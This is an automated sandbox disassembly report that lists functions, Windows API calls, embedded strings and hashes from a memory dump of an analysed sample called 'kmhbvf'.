Part of subcall function 00F39560: _memmove.LIBCMT ref: 00F39599
Part of subcall function 00F39560: _memmove.LIBCMT ref: 00F395A8

_wcscmp.LIBCMT ref: 00F397AA

Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DE1
Part of subcall function 00F39CF1: _wcscmp.LIBCMT ref: 00F39DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F39A0D
_wcsncpy.LIBCMT ref: 00F39A80
DeleteFileW.KERNEL32(?,?), ref: 00F39AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F39ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39AEF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: ff79ab616207e9b9aa77602e699fdd0b179df2a85e9cdd05acad5fc6bdf628db
Instruction ID: c19563932e206daa9a84e8c2d5010deab5bd1a2773abffb4389670d086f6832a
Opcode Fuzzy Hash: ff79ab616207e9b9aa77602e699fdd0b179df2a85e9cdd05acad5fc6bdf628db
Instruction Fuzzy Hash: 43C14DB2D0021DAADF11DF95CC85ADEB7BDEF44320F0040AAF609E7151EBB49A849F65

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE5BF1
GetMenuItemCount.USER32 ref: 00F20E7B
GetMenuItemCount.USER32 ref: 00F20F2B
GetCursorPos.USER32(?), ref: 00F20F6F
SetForegroundWindow.USER32(00000000), ref: 00F20F78
TrackPopupMenuEx.USER32(00F97890,00000000,?,00000000,00000000,00000000), ref: 00F20F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F20F97

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 4697aa0f9d159efdfa0e096c60606ead1a3db879894f553d827ec256660f2465
Instruction ID: 060cf1c38d16116151a34a9d2e3427f2acec3d31099b3cb8b528f333210d4c33
Opcode Fuzzy Hash: 4697aa0f9d159efdfa0e096c60606ead1a3db879894f553d827ec256660f2465
Instruction Fuzzy Hash: DF710532A45719BFEB208B55DC45FAAFF64FF04728F240216F524661D2CBB16C50EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F283FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

_memset.LIBCMT ref: 00F28489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F284BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F284DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F284F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F28520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F28548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F28553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F28558

Strings

\IPC$, xrefs: 00F284A0
SOFTWARE\Classes\, xrefs: 00F2842A
\CLSID, xrefs: 00F28440

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 544a44c313cabdb74b5e6e48ea48919625a206933d7cec69ffdc375055762dc5
Instruction ID: d84b6d12687af9ec525249a3725d435400ccc51b3a2fb77cf44da55dfb7ce6b8
Opcode Fuzzy Hash: 544a44c313cabdb74b5e6e48ea48919625a206933d7cec69ffdc375055762dc5
Instruction Fuzzy Hash: D1414572C1022DABCF11EBA4DC95DEEB7B8FF08350F14416AE911B2261EA319E45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491

Strings

HKEY_CLASSES_ROOT, xrefs: 00F51524
HKEY_USERS, xrefs: 00F51592
HKCC, xrefs: 00F5155F
HKEY_CURRENT_CONFIG, xrefs: 00F5154E
HKEY_CURRENT_USER, xrefs: 00F51570
HKCR, xrefs: 00F51539
HKLM, xrefs: 00F5150F
HKEY_LOCAL_MACHINE, xrefs: 00F514FA
HKU, xrefs: 00F515A3
HKCU, xrefs: 00F51581

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: a24af2471a170fe459f322b10300363d799261d79ff19b82e4942b02ac0dd59b
Instruction ID: 81c23231db422cbb85f2aa59584feb006337ca7ce143e2618db6ea33df25c7f7
Opcode Fuzzy Hash: a24af2471a170fe459f322b10300363d799261d79ff19b82e4942b02ac0dd59b
Instruction Fuzzy Hash: 5E41793190025E8BDF10EF90D940BEA33A4BF51351F641454FE92AB293EB31ED19EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F35882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Part of subcall function 00EE153B: _memmove.LIBCMT ref: 00EE15C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F358EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F35901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F35912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F35924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F35935

Strings

status PlayMe mode, xrefs: 00F358E6
alias PlayMe, xrefs: 00F358C4
play PlayMe, xrefs: 00F35930
play PlayMe wait, xrefs: 00F3591F
open , xrefs: 00F3589A
close PlayMe, xrefs: 00F358FC, 00F35929

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 4bce2af5ff88b626853f6656e68e94d08513e24a730f0a104e51e24c995b752f
Instruction ID: 78904368dc744e868fc9fdfd6fde1875a50592ead2d9e0564aff0ff11b63cfcf
Opcode Fuzzy Hash: 4bce2af5ff88b626853f6656e68e94d08513e24a730f0a104e51e24c995b752f
Instruction Fuzzy Hash: 3E11B231A4026DB9D720B7A2CC4AEFF7BBCFBD1F60F400469B411A20D1EE705948DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F34C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F34C27
gethostname.WSOCK32(?,00000100), ref: 00F34C41
gethostbyname.WSOCK32(?), ref: 00F34C4E
_wcscpy.LIBCMT ref: 00F34C76
_memmove.LIBCMT ref: 00F34C89
inet_ntoa.WSOCK32(?), ref: 00F34C94
_strcat.LIBCMT ref: 00F34CA2
_wcscpy.LIBCMT ref: 00F34CB9
WSACleanup.WSOCK32 ref: 00F34CC7
_wcscpy.LIBCMT ref: 00F34CD5

Strings

0.0.0.0, xrefs: 00F34C70

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 9324152cd2317ed46db356337a73c45add29c5d6d6fb7cb04e4acd4f5bb25856
Instruction ID: e038e3451d8c6ed56113a672b22131a16bfe5492ab904d437650db5e50032ee4
Opcode Fuzzy Hash: 9324152cd2317ed46db356337a73c45add29c5d6d6fb7cb04e4acd4f5bb25856
Instruction Fuzzy Hash: A511E43290510DAFCB11E7709C4AEEB77BCDF41730F1411A5F148A6191EFB4AD82EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00F35530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F35535

Part of subcall function 00EF0859: timeGetTime.WINMM(?,00000002,00EDC22C), ref: 00EF085D

Sleep.KERNEL32(0000000A), ref: 00F35561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00F35585
FindWindowExW.USER32 ref: 00F355A7
SetActiveWindow.USER32 ref: 00F355C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F355D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F355F3
Sleep.KERNEL32(000000FA), ref: 00F355FE
IsWindow.USER32 ref: 00F3560A
EndDialog.USER32(00000000), ref: 00F3561B

Strings

BUTTON, xrefs: 00F35599

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 5743861d7f597426d1816e0005924de218b47692cef64260c0d20462cfef86db
Instruction ID: 28914b98dabc43875e9741a3454a2adc3a08c641ebc4b6d370fa62b847a5ec76
Opcode Fuzzy Hash: 5743861d7f597426d1816e0005924de218b47692cef64260c0d20462cfef86db
Instruction Fuzzy Hash: 9E21A17020464CAFE7905F60EC89B263B6AEB867B5F191025F01281171CFB1DD55BB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F3DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

CoInitialize.OLE32(00000000), ref: 00F3DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F3DCC0
SHGetDesktopFolder.SHELL32(?), ref: 00F3DCD4
CoCreateInstance.OLE32(00F63D4C,00000000,00000001,00F8B86C,?), ref: 00F3DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F3DD8F
CoTaskMemFree.OLE32(?,?), ref: 00F3DDE7
_memset.LIBCMT ref: 00F3DE24
SHBrowseForFolderW.SHELL32(?), ref: 00F3DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F3DE83
CoTaskMemFree.OLE32(00000000), ref: 00F3DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F3DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00F3DEC3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 687abd8e59052eed4f0e6b6e53df8a48177e4f9328ff701cf69c8e82a7afb32e
Instruction ID: f920d9106a8f8e6abf02c73e4f58345a03a7c95b748d2b838cee219b26a858bc
Opcode Fuzzy Hash: 687abd8e59052eed4f0e6b6e53df8a48177e4f9328ff701cf69c8e82a7afb32e
Instruction Fuzzy Hash: 19B1F775A00119AFDB14DFA4D888DAEBBF9EF48314F1084A9E905EB361DB30EE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F3081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F30896
SetKeyboardState.USER32(?), ref: 00F30901
GetAsyncKeyState.USER32(000000A0), ref: 00F30921
GetKeyState.USER32 ref: 00F30938
GetAsyncKeyState.USER32(000000A1), ref: 00F30967
GetKeyState.USER32 ref: 00F30978
GetAsyncKeyState.USER32(00000011), ref: 00F309A4
GetKeyState.USER32 ref: 00F309B2
GetAsyncKeyState.USER32(00000012), ref: 00F309DB
GetKeyState.USER32 ref: 00F309E9
GetAsyncKeyState.USER32(0000005B), ref: 00F30A12
GetKeyState.USER32 ref: 00F30A20

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c33e3aae49d699aebe0ccd61d8747aa041e0188aac0cbb5f7206a80dc111df43
Instruction ID: 4501317420b4d2a78e0a4d775011aa8fa134123f4273f72701fe4641df4f2560
Opcode Fuzzy Hash: c33e3aae49d699aebe0ccd61d8747aa041e0188aac0cbb5f7206a80dc111df43
Instruction Fuzzy Hash: 7051CA20D0578829FB35DBB088207AABFB49F013B0F08459BD5C2575C3DE689A4CDBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00F2CE1C
GetWindowRect.USER32 ref: 00F2CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F2CE8C
GetDlgItem.USER32 ref: 00F2CE97
GetWindowRect.USER32 ref: 00F2CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F2CEFD
GetDlgItem.USER32 ref: 00F2CF0B
GetWindowRect.USER32 ref: 00F2CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F2CF5F
GetDlgItem.USER32 ref: 00F2CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F2CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00F2CF97

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1a2daf7394f29a450f0efa4feb4057c0c841d08662b9f0f946c38cb7abab0b0c
Instruction ID: 39a96c2ef1bded987c9c39743e646147b4eb0b4e1c1536995ddc136e887c3ab4
Opcode Fuzzy Hash: 1a2daf7394f29a450f0efa4feb4057c0c841d08662b9f0f946c38cb7abab0b0c
Instruction Fuzzy Hash: 98513571F00209AFDF18CF69DD95A6EBBB6EB88710F14812DF516D7290DBB1AD009B50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2412,?,00000000,?,?,?,?,00ED1AA7,00000000,?), ref: 00ED1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED24AF
KillTimer.USER32(-00000001,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00ED254A
DestroyAcceleratorTable.USER32 ref: 00F0BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C04B
DeleteObject.GDI32(00000000), ref: 00F0C05D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fcf6dfd02056f417451e24126234c2dd8c7c1b5b32cf22056a40ecb8e029642b
Instruction ID: e3742cf9ea32fba21600909fec4c0e396f05b3ea2373cbccca773be8dfababe0
Opcode Fuzzy Hash: fcf6dfd02056f417451e24126234c2dd8c7c1b5b32cf22056a40ecb8e029642b
Instruction Fuzzy Hash: 9E61CE30514704DFDB35AF14D948B26B7F1FF50326F20A61EE562A6AA0C771A882FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC

GetSysColor.USER32(0000000F), ref: 00ED25AF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0088fa14884c10d66dd2bbd9f157f7ac837dfdd036dd0aba54a138a0eb34e287
Instruction ID: 5ee214c4ee35fae638d69bc371c83ee2980b7c884558c5b3bc294e1dee344096
Opcode Fuzzy Hash: 0088fa14884c10d66dd2bbd9f157f7ac837dfdd036dd0aba54a138a0eb34e287
Instruction Fuzzy Hash: EC41B831404244AFDB215F289C88BB93765EB16335F18425AFE769E2E5DB708C42FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F3AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F60980), ref: 00F3AF4E
GetDriveTypeW.KERNEL32(00000061,00F8B5F0,00000061), ref: 00F3B018
_wcscpy.LIBCMT ref: 00F3B042

Strings

cdrom, xrefs: 00F3AF6A
fixed, xrefs: 00F3AF96
unknown, xrefs: 00F3AFD9
removable, xrefs: 00F3AF80
ramdisk, xrefs: 00F3AFC2
all, xrefs: 00F3AF54
network, xrefs: 00F3AFAC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: aa47693747d64ffbf4d39f0e70ac395c56ec619d098fe62b7222aa26702492ff
Instruction ID: 399c10daf4051183429f35074d765506cec8eeb7c14835150fb28374ced25033
Opcode Fuzzy Hash: aa47693747d64ffbf4d39f0e70ac395c56ec619d098fe62b7222aa26702492ff
Instruction Fuzzy Hash: 8551CE715083099BC314EF25C891AABB7E5EF94320F14481DF5A56B2A2EB31DD09EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00ED4D62
__swprintf.LIBCMT ref: 00ED4DAC
__i64tow.LIBCMT ref: 00F0DB3B

Strings

%.15g, xrefs: 00ED4DA6
0x%p, xrefs: 00F0DB1D
False, xrefs: 00F0DB03
True, xrefs: 00F0DAFC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a8481bec26ff6c502eef83ee27d92981b4571d803e0479009bd38585eaea3bb3
Instruction ID: f246e86ca7e9f20c00c471f4b07eb8b21ec729ab2e2b6a663572ef00a85f3511
Opcode Fuzzy Hash: a8481bec26ff6c502eef83ee27d92981b4571d803e0479009bd38585eaea3bb3
Instruction Fuzzy Hash: A941D7B1A0420DAFDB24DF74C842E7A73E9EB45310F2044AEE149E73D2EA319942E711

Uniqueness

Uniqueness Score: -1.00%

Function 00F57777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F5778F
CreateMenu.USER32 ref: 00F577AA
